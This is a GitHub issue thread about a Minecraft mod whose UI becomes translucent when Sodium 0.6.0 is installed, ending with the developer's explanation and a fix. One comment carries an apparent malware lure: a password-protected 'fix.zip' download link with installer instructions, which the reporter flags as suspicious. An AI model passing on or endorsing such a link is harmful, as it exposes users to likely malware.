### ISSUE TITLE
UI in world affected by transparency effect when with Sodium 0.6.0-beta.1

### ISSUE THREAD

**Issue by 3gf8jv4dv** [DevBobcorn/AcryliCraft#21]
Normally, it seems that the pause menu should not be affected by transparency effects. This is especially noticeable when the window is not in focus.

The game’s screenshot feature looked no different, so I took screenshots using third-party software. I set my desktop background to solid black to avoid any confusion.

Embeddium has no problem. The screenshot is for NeoForge, but Fabric and Sodium have the same problem.

<details>
<summary>Normal</summary>

![normal](https://github.com/user-attachments/assets/f873713c-dd97-4337-b756-d3d5ebe81ad2)

</details>

<details>
<summary>with Sodium 0.6.0</summary>

![sodium-0.6.0](https://github.com/user-attachments/assets/183de5db-2998-4fd0-ad44-7315a6529dfa)

</details>

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by 3gf8jv4dv** [comment]
@DevBobcorn

Oh god. Please delete the suspicious comment above.

**Comment by 3gf8jv4dv** [comment]
After checking again, some UIs were also affected after entering the world (e.g. Inventory in HUD).

**Comment by DevBobcorn** [comment]
So in a [new feature](https://github.com/CaffeineMC/sodium-fabric/pull/2676) in Sodium 0.6, they altered how the main render target is eventually blitted onto the window, and this bypasses my alpha channel workarounds, leaving the main render target translucent even after entering game world.

**Comment by DevBobcorn** [comment]
![shot](https://github.com/user-attachments/assets/c794ba02-c758-4158-bb54-a7da95f83c64)
Problem solved... I guess.
